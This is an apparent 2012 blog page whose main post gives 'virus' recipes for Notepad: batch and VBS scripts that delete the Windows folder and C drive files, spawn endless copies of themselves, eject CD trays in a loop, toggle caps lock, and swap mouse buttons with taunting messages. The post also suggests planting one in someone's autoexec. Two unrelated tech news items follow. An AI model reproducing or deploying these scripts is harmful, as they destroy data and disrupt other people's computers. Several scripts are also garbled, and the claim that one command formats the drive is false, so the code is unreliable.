Ads 468x60px

Social Icons

Friday, 27 April 2012

How to make virus in Notepad?

make virus

I am waiting all the time for this post, but for some reasons I can’t. So, it’s a special post for all the viewers who are regularly following my blog. So here is “how to make virus in notepad".

Open notepad
TYPE erase c:\windows

And save as

ANYNAME.cmd (Not .txt)

What does it do? : - It will erase c:/windows.


Here is the code that opens multiple windows. It means infinite windows open until continue you restart the computer: save on danger.bat (Not .txt) and code written in notepad is:

@echo off
Copy 0% danger.bat
Start danger.bat


Here is one more simple virus coding. Go to notepad and type the following:
@Echo off
Del C:\ *.*|y

Save it as Del.bat
This code will format complete C drive .


This one code is visual basic script so save in notepad as whateveryouwant.vbs


Set oWMP = CreateObject(”WMPlayer.OCX.7″ )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next ‘ cdrom
loop
end if

WARNING:
Press ctrl + alt + delete and go to processes, and “End wscript.exe” to stop.

A code that turns on and off your caps lock repeatedly, this code is also in VBS, end same way as last time, this turns on and off your caps lock every tenth of a second.



Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

loop

A batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someone’s autoexe, that would really make them mad)



@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it


Copy and paste the below into notepad and save it as Anyname.bat
Run it, and enjoy anarchy.


Code:

@echo off
:START
echo Error, Critical Windows Failure. Format Hard Disk and Reinstall OS!
start hi.bat
GOTO START


Don't worry this code will not effect your computer until you click on it.
Watch daily for latest techniques.

Thursday, 19 April 2012

Intel’s new Lava XOLO smartphone will be a winner in India?


The smartphone race in India is not coming to an end anytime soon. RIM, recently launched it’s ‘new afforable’ BlackBerry curve 9220 in the hope of boosting sales in one of the few markets where it seems to be doing well. Now Lava International in collaboration with Intel have launched their first smartphone in India. These phones are run with Intel’s brand new Medfield Atom processors.
Features of the phone include 4.03-inch display with a rather high resolution of 1024 x 600, an 8 megapixel camera and the phone runs on Android 2.3 Gingerbread but can be upgraded to Android 4.0 Ice Cream Sandwich and in India price at INR 22000.

What remains to be seen is whether this will be just another phone in the line of Androids that seem to be flooding the market or will it actually stand out against competing phones from Samsung and HTC.

Wednesday, 18 April 2012

Google has introduced fastest internet ever with 1gpbs speed.

Friends your favorite google inc. now going to launch worlds fastest internet broadband service name super fast internet fiber. The project for this is now on progress in Kansas city, America. And with a great hope soon it will also launch in our country as well. so for all the Internet lovers its times to cheers. the people of US should go to some place and enjoy with a coke or party.
for more info about this goto this LINK.

Page No:

Copyright

Protected by Copyscape Duplicate Content Detection Software

LinkWithin

Related Posts Plugin for WordPress, Blogger...